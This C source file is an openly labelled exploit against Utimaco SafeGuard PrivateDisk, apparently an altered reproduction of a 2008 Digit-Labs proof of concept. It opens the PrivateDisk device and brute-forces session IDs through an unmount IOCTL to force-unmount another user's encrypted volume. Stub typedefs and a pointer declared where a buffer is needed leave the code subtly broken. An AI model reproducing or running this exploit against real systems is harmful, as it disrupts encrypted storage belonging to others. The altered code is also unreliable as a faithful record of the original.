
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct ioctl_req {char* volume_buf; int session_id; } ;
typedef int HANDLE ;
typedef int DWORD ;
typedef char CHAR ;
typedef scalar_t__ BOOL ;


 int CloseHandle (int) ;
 int CreateFileA (char*,int ,int,int *,int ,int ,int *) ;
 scalar_t__ DeviceIoControl (int,int ,struct ioctl_req*,int,struct ioctl_req*,int,int*,int ) ;
 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int FILE_SHARE_READ ;
 int FILE_SHARE_WRITE ;
 int GENERIC_READ ;
 int INVALID_HANDLE_VALUE ;
 int OPEN_EXISTING ;
 int SGPD_MAX_SESSION_ID ;
 int SGPD_UNMOUNT_IOCTL ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int stderr ;
 int strncpy (char*,char*,int) ;

int
main (int argc, char **argv)
{
  struct ioctl_req req;
  DWORD i, j, rlen;
  CHAR buf[0x100];
  HANDLE hFile;
  BOOL result;

  printf ("Utimaco Safeware AG - SafeGuard PrivateDisk unmount exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <volume file>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  hFile = CreateFileA ("\\\\.\\PrivateDisk", GENERIC_READ,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, ((void*)0),
                       OPEN_EXISTING, 0, ((void*)0));
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
      exit (EXIT_FAILURE);
    }

  memset (buf, 0, sizeof buf);
  strncpy (buf, argv[1], sizeof buf - 1);

  for (i = 0, j = 0; i < sizeof req.volume_buf - 4; i += 2, j++)
    {
      req.volume_buf[i] = buf[j];
      req.volume_buf[i+1] = 0x00;
    }

  for (i = 0; i < SGPD_MAX_SESSION_ID; i++)
    {
      req.session_id = i;

      result = DeviceIoControl (hFile, SGPD_UNMOUNT_IOCTL,
                                &req, sizeof req,
                                &req, sizeof req, &rlen, 0);
      if (result)
        {
          printf ("* found, session_id: %d, volume name: %s", i, buf);
          break;
        }

      if (!(i % 64))
        {
          printf ("* trying session_id: %d\r", i);
        }
    }
  printf ("\n* done\n");

  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}
